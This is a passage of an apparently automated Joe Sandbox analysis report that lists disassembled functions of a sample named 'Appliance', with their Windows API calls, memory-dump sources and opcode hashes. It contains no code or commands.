                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ShowWindow
                                                                                                                                            • String ID: (
                                                                                                                                            • API String ID: 1268545403-2063206799
                                                                                                                                            • Opcode ID: 52c29556e967c24b7a337141cd2cecfcf588769dc8103d1b0ca508a7eeb38c7b
                                                                                                                                            • Instruction ID: 1b5e4dc779baf75e12a67963dd822706dbf6a3ba75f58912bdc65b8713a3a333
                                                                                                                                            • Opcode Fuzzy Hash: 52c29556e967c24b7a337141cd2cecfcf588769dc8103d1b0ca508a7eeb38c7b
                                                                                                                                            • Instruction Fuzzy Hash: FE41293061C3C89EC7388B3DC9C8B697B91AB46315F18452FE98766B60D631E894D771
                                                                                                                                            APIs
                                                                                                                                            • CreateMenu.USER32 ref: 00E54715
                                                                                                                                            • SetMenu.USER32(?,00000000), ref: 00E54724
                                                                                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E547AC
                                                                                                                                            • IsMenu.USER32(?), ref: 00E547C0
                                                                                                                                            • CreatePopupMenu.USER32 ref: 00E547CA
                                                                                                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00E547F7
                                                                                                                                            • DrawMenuBar.USER32 ref: 00E547FF
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                                                                            • String ID: 0$F
                                                                                                                                            • API String ID: 161812096-3044882817
                                                                                                                                            • Opcode ID: 7b885f25a2735a9fbf645d02931b0197489324817349e1de853abfdc103b8f03
                                                                                                                                            • Instruction ID: 69decf70b42cd3d1557b7ea6b1b8a984218b95f3353735fbe0264545afaec517
                                                                                                                                            • Opcode Fuzzy Hash: 7b885f25a2735a9fbf645d02931b0197489324817349e1de853abfdc103b8f03
                                                                                                                                            • Instruction Fuzzy Hash: 6A4187B5A01309EFDB28CF65D844EAA7BB5FF49319F044829FE05A7390D770AA18CB50
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00DCB329: _wcslen.LIBCMT ref: 00DCB333
                                                                                                                                              • Part of subcall function 00E245FD: GetClassNameW.USER32(?,?,000000FF), ref: 00E24620
                                                                                                                                            • SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 00E228B1
                                                                                                                                            • GetDlgCtrlID.USER32 ref: 00E228BC
                                                                                                                                            • GetParent.USER32 ref: 00E228D8
                                                                                                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 00E228DB
                                                                                                                                            • GetDlgCtrlID.USER32(?), ref: 00E228E4
                                                                                                                                            • GetParent.USER32(?), ref: 00E228F8
                                                                                                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 00E228FB
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                                            • API String ID: 711023334-1403004172
                                                                                                                                            • Opcode ID: ffcf22cd13cbf1794f8ff080426c17775eb3a4964f463c163a2f06859d69c61c
                                                                                                                                            • Instruction ID: b7b73098f28f7f15e8699652cf91552d85fc6ce819f2f9a5bc775e6ed546e4d5
                                                                                                                                            • Opcode Fuzzy Hash: ffcf22cd13cbf1794f8ff080426c17775eb3a4964f463c163a2f06859d69c61c
                                                                                                                                            • Instruction Fuzzy Hash: 7921C275D00228BFCF15ABA0DC85EEEBBB4EF09310F00051AF952B72A1DB758959DB60
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00DCB329: _wcslen.LIBCMT ref: 00DCB333
                                                                                                                                              • Part of subcall function 00E245FD: GetClassNameW.USER32(?,?,000000FF), ref: 00E24620
                                                                                                                                            • SendMessageW.USER32(?,00000186,00020000,00000000), ref: 00E22990
                                                                                                                                            • GetDlgCtrlID.USER32 ref: 00E2299B
                                                                                                                                            • GetParent.USER32 ref: 00E229B7
                                                                                                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 00E229BA
                                                                                                                                            • GetDlgCtrlID.USER32(?), ref: 00E229C3
                                                                                                                                            • GetParent.USER32(?), ref: 00E229D7
                                                                                                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 00E229DA
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                                            • API String ID: 711023334-1403004172
                                                                                                                                            • Opcode ID: f8a9dda442a0b2e9d4fb33de66bfda74fd4db6f49d70acba0f69d3330ef14006
                                                                                                                                            • Instruction ID: e7fa3c53c52e0130faa848a427844757902280413313968f66e4b1c26b1fbd48
                                                                                                                                            • Opcode Fuzzy Hash: f8a9dda442a0b2e9d4fb33de66bfda74fd4db6f49d70acba0f69d3330ef14006
                                                                                                                                            • Instruction Fuzzy Hash: 5D219F75D00228BFCF15ABA0DC86EEEBBB8EF09314F00541BB951B7191CB758859DB61
                                                                                                                                            APIs
                                                                                                                                            • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00E54539
                                                                                                                                            • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00E5453C
                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00E54563
                                                                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00E54586
                                                                                                                                            • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00E545FE
                                                                                                                                            • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00E54648
                                                                                                                                            • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00E54663
                                                                                                                                            • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00E5467E
                                                                                                                                            • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00E54692
                                                                                                                                            • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00E546AF
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MessageSend$LongWindow
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 312131281-0
                                                                                                                                            • Opcode ID: af2ce73440c933a59ce8811400ac3ddfc078358ae739c566a66b37357c687969
                                                                                                                                            • Instruction ID: d6954586c81aecde8db127ea501614f1b4f04c55d31db8a8913a5d6ed1b2e795
                                                                                                                                            • Opcode Fuzzy Hash: af2ce73440c933a59ce8811400ac3ddfc078358ae739c566a66b37357c687969
                                                                                                                                            • Instruction Fuzzy Hash: 8A616CB5A00208AFDB10DFA4CC81FEE77B8EB49714F10055AFA14B72A1D7B4A989DB50
                                                                                                                                            APIs
                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00E2BB18
                                                                                                                                            • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00E2ABA8,?,00000001), ref: 00E2BB2C
                                                                                                                                            • GetWindowThreadProcessId.USER32(00000000), ref: 00E2BB33
                                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00E2ABA8,?,00000001), ref: 00E2BB42
                                                                                                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 00E2BB54
                                                                                                                                            • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00E2ABA8,?,00000001), ref: 00E2BB6D
                                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00E2ABA8,?,00000001), ref: 00E2BB7F
                                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00E2ABA8,?,00000001), ref: 00E2BBC4
                                                                                                                                            • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00E2ABA8,?,00000001), ref: 00E2BBD9
                                                                                                                                            • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00E2ABA8,?,00000001), ref: 00E2BBE4
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2156557900-0
                                                                                                                                            • Opcode ID: 6d9bfddd129c83a3a89bc0238267db0cf04b68c8c2a36f1757ffdf1f9b628909
                                                                                                                                            • Instruction ID: a68eb581edb603ff3fabbe499d744a56d7189fd4a5d8ff0fe0fb293c41987a94
                                                                                                                                            • Opcode Fuzzy Hash: 6d9bfddd129c83a3a89bc0238267db0cf04b68c8c2a36f1757ffdf1f9b628909
                                                                                                                                            • Instruction Fuzzy Hash: 9131A2B2908314AFDB249B26EC88FA977A9EB4431AF104407FA05F71E4D7B49C49CB21
                                                                                                                                            APIs
                                                                                                                                            • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00DC2AF9
                                                                                                                                            • OleUninitialize.OLE32(?,00000000), ref: 00DC2B98
                                                                                                                                            • UnregisterHotKey.USER32(?), ref: 00DC2D7D
                                                                                                                                            • DestroyWindow.USER32(?), ref: 00E03A1B
                                                                                                                                            • FreeLibrary.KERNEL32(?), ref: 00E03A80
                                                                                                                                            • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00E03AAD
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                                            • String ID: close all
                                                                                                                                            • API String ID: 469580280-3243417748
                                                                                                                                            • Opcode ID: d34cd81537487e1e8cff66903d3ae2eb6cb827ed49d0ba987b2a7d2320bf3149
                                                                                                                                            • Instruction ID: 92d01fce7bec2ce6ca306249533d2f03f9037eeca6101047026ad36312623fde
                                                                                                                                            • Opcode Fuzzy Hash: d34cd81537487e1e8cff66903d3ae2eb6cb827ed49d0ba987b2a7d2320bf3149
                                                                                                                                            • Instruction Fuzzy Hash: 8AD138317012129FCB29EF25C845F69F7A4EF04714F1156ADE84ABB2A1CB30AD92CF60
                                                                                                                                            APIs
                                                                                                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00E389F2
                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00E38A06
                                                                                                                                            • GetFileAttributesW.KERNEL32(?), ref: 00E38A30
                                                                                                                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 00E38A4A
                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00E38A5C
                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00E38AA5
                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00E38AF5
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CurrentDirectory$AttributesFile
                                                                                                                                            • String ID: *.*
                                                                                                                                            • API String ID: 769691225-438819550
                                                                                                                                            • Opcode ID: 951e577ed9f008fe1e3163d87ecd0f82e79f0c00fd62ba0d7ab14b0664a470e8
                                                                                                                                            • Instruction ID: 2303085c79bdb77ad01a535ddbb552beabac23ab042634f8373b7bbae185d2e1
                                                                                                                                            • Opcode Fuzzy Hash: 951e577ed9f008fe1e3163d87ecd0f82e79f0c00fd62ba0d7ab14b0664a470e8
                                                                                                                                            • Instruction Fuzzy Hash: 1181BF729043459BCB24EF14C948ABABBE8FF94314F54581EF889E7250DF34D945CBA2
                                                                                                                                            APIs
                                                                                                                                            • IsWindow.USER32(00000000), ref: 00E58992
                                                                                                                                            • IsWindowEnabled.USER32(00000000), ref: 00E5899E
                                                                                                                                            • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 00E58A79
                                                                                                                                            • SendMessageW.USER32(00000000,000000B0,?,?), ref: 00E58AAC
                                                                                                                                            • IsDlgButtonChecked.USER32(?,00000000), ref: 00E58AE4
                                                                                                                                            • GetWindowLongW.USER32(00000000,000000EC), ref: 00E58B06
                                                                                                                                            • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00E58B1E
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                                                                            • String ID: (
                                                                                                                                            • API String ID: 4072528602-2063206799
                                                                                                                                            • Opcode ID: e7f4f3b01985e812e72174f9b06afb0dae6f309a6db1fcf15080539a962ab717
                                                                                                                                            • Instruction ID: a8115e0757dfcb4d27b0614cc3fba958c6b8f41d03341080afeab847a2ebdc95
                                                                                                                                            • Opcode Fuzzy Hash: e7f4f3b01985e812e72174f9b06afb0dae6f309a6db1fcf15080539a962ab717
                                                                                                                                            • Instruction Fuzzy Hash: 0471D134604204AFDF259F51C984FBABBB9FF49306F042C5AEC45B7262CB31A948CB11
                                                                                                                                            APIs
                                                                                                                                            • SetWindowLongW.USER32(?,000000EB), ref: 00DC74D7
                                                                                                                                              • Part of subcall function 00DC7567: GetClientRect.USER32(?,?), ref: 00DC758D
                                                                                                                                              • Part of subcall function 00DC7567: GetWindowRect.USER32(?,?), ref: 00DC75CE
                                                                                                                                              • Part of subcall function 00DC7567: ScreenToClient.USER32(?,?), ref: 00DC75F6
                                                                                                                                            • GetDC.USER32 ref: 00E06083
                                                                                                                                            • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00E06096
                                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00E060A4
                                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00E060B9
                                                                                                                                            • ReleaseDC.USER32(?,00000000), ref: 00E060C1
                                                                                                                                            • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00E06152
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                                            • String ID: U
                                                                                                                                            • API String ID: 4009187628-3372436214
                                                                                                                                            • Opcode ID: de44e1580b850e6178afb756d49491014d63bade35713df012b83f380c580504
                                                                                                                                            • Instruction ID: de3edd043c0cd80922622dba67011112a0e7a51396c7b412882a000a7c28eef7
                                                                                                                                            • Opcode Fuzzy Hash: de44e1580b850e6178afb756d49491014d63bade35713df012b83f380c580504
                                                                                                                                            • Instruction Fuzzy Hash: D771FF31504206EFCF358F64CC84BAA3BB5FF48325F14566AED596B2A2C73088A5DF60
                                                                                                                                            APIs
                                                                                                                                            • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00E3CCB7
                                                                                                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00E3CCDF
                                                                                                                                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00E3CD0F
                                                                                                                                            • GetLastError.KERNEL32 ref: 00E3CD67
                                                                                                                                            • SetEvent.KERNEL32(?), ref: 00E3CD7B
                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 00E3CD86
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3113390036-3916222277
                                                                                                                                            • Opcode ID: 3c2e97fc4ecb876459b08e41d7b6a5858e4b176fa73c8f63fd060a5ffb1c6d3f
                                                                                                                                            • Instruction ID: 0cf97b5b05e57ee7041116bd7542869394ec00059bfac60ebe991e79ff1f1f73
                                                                                                                                            • Opcode Fuzzy Hash: 3c2e97fc4ecb876459b08e41d7b6a5858e4b176fa73c8f63fd060a5ffb1c6d3f
                                                                                                                                            • Instruction Fuzzy Hash: 7F318BB1504308AFD721AF659C88ABB7FFCEB48744F60592AF446F2210DB30E908DB61
                                                                                                                                            APIs
                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00E055AE,?,?,Bad directive syntax error,00E5DCD0,00000000,00000010,?,?), ref: 00E2A236
                                                                                                                                            • LoadStringW.USER32(00000000,?,00E055AE,?), ref: 00E2A23D
                                                                                                                                              • Part of subcall function 00DCB329: _wcslen.LIBCMT ref: 00DCB333
                                                                                                                                            • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00E2A301
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: HandleLoadMessageModuleString_wcslen
                                                                                                                                            • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                                            • API String ID: 858772685-4153970271
                                                                                                                                            • Opcode ID: 75685bb17bf997ae1282a76849c4bfa2e6af1c7aa96ca2a3c5f6b6deb0e4b3c4
                                                                                                                                            • Instruction ID: b532357e20e404e2f7cd60e31046ac3edc6b1c0cef5a5ecb107c3ceb661f1134
                                                                                                                                            • Opcode Fuzzy Hash: 75685bb17bf997ae1282a76849c4bfa2e6af1c7aa96ca2a3c5f6b6deb0e4b3c4
                                                                                                                                            • Instruction Fuzzy Hash: DB212F3280435AEFCF11AB90CC06EEE7779FF18700F045469F51A760A2DA71A558DB71
                                                                                                                                            APIs
                                                                                                                                            • GetParent.USER32 ref: 00E229F8
                                                                                                                                            • GetClassNameW.USER32(00000000,?,00000100), ref: 00E22A0D
                                                                                                                                            • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00E22A9A
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ClassMessageNameParentSend
                                                                                                                                            • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                                            • API String ID: 1290815626-3381328864
                                                                                                                                            • Opcode ID: f6945474273f4775c2bcd08398a1e3526fb41c1e33277835e0711683d492f04a
                                                                                                                                            • Instruction ID: 1fa8a0c2d6bf57cefbecbd8f67bd2555feb9217ca322452dc70936a6ba1b959f
                                                                                                                                            • Opcode Fuzzy Hash: f6945474273f4775c2bcd08398a1e3526fb41c1e33277835e0711683d492f04a
                                                                                                                                            • Instruction Fuzzy Hash: 9E11C6B6648317BDFA247722FC07EA637ACDF15728B20101AF70CF54D1FBA1A8514624
                                                                                                                                            APIs
                                                                                                                                            • GetClientRect.USER32(?,?), ref: 00DC758D
                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00DC75CE
                                                                                                                                            • ScreenToClient.USER32(?,?), ref: 00DC75F6
